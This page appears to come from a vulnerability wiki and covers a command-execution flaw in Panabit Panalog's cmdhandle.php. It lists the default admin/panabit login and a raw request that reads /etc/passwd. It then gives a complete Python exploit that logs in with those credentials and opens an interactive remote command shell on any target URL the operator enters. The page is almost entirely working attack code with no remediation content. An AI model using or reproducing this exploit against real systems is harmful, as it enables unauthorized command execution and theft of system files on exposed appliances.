PWNWIK.COM
,
默认账号密码
admin/panabit
Request
POST /Maintain/cmdhandle.php HTTP/1.1 Host: Connection: close Content-Length: 31 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90" Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: cloud_limit=20; cloud_left=block; PHPSESSID=9lpglosgab794j5ouvv0sg7q73 cmd=cat%2520%252Fetc%252Fpasswd
POC
import requests import sys import random import re import base64 import time from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \03334mPOC_Des: http://wiki.peiqi.tech \0330m') print('+ \03334mGithub : https://github.com/PeiQi0 \0330m') print('+ \03334m公众号 : PeiQi文库 \0330m') print('+ \03334mTitle : Panabit Panalog cmdhandle.php 后台命令执行漏洞 \0330m') print('+ \03336m使用格式: python3 poc.py \0330m') print('+ \03336mUrl >>> http://xxx.xxx.xxx.xxx \0330m') print('+------------------------------------------') def POC_1(target_url): vuln_url = target_url + "/login.php" cookie = "PHPSESSID=111111111111111111111peiqi" headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": cookie } data = "user=admin&mypass=panabit&sec=1619123700835.617&useldap=0" try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, headers=headers,data=data, verify=False, timeout=5) print("\03336mo 正在请求 {}/login.php.... \0330m".format(target_url)) if "yes" in response.text and "yn" in response.text and response.status_code == 200: print("\03332mo 目标 {} 存在默认口令 admin/panabit \0330m".format(target_url)) print("\03336mo 设置Cookie : {} \0330m".format(cookie)) POC_2(target_url, cookie) else: print("\03331mx 请求失败 \0330m") sys.exit(0) except Exception as e: print("\03331mx 请求失败 \0330m", e) def POC_2(target_url, Cookie): vuln_url = target_url + "/Maintain/cmdhandle.php" headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": "{}".format(Cookie) } data = "cmd=cat /etc/passwd" try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url,data=data, headers=headers, verify=False, timeout=5) if 'root' in response.text and response.status_code == 200: print("\03332mo 目标 {}存在漏洞 ,执行 cat /etc/passwd \0330m".format(target_url)) print("\03336mo 响应为:\n{} \0330m".format(response.text)) while True: Cmd = input("\03335mCmd >>> \0330m") if Cmd == "exit": sys.exit(0) else: POC_3(target_url, Cmd, Cookie) except Exception as e: print("\03331mx 请求失败 \0330m", e) def POC_3(target_url, Cmd, Cookie): Cmd = Cmd.replace(" ", "%20") vuln_url = target_url + "/Maintain/cmdhandle.php" headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": "{}".format(Cookie) } data = "cmd={}".format(Cmd) try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=data,headers=headers, verify=False, timeout=5) response_data = response.text.replace("<br/>", "\n") print("\03336mo 响应为:\n{} \0330m".format(response_data)) except Exception as e: print("\03331mx 请求失败 \0330m", e) if __name__ == '__main__': title() target_url = str(input("\03335mPlease input Attack Url\nUrl >>> \0330m")) POC_1(target_url)
PWNWIK.COM==免费、自由、人人可编辑的漏洞库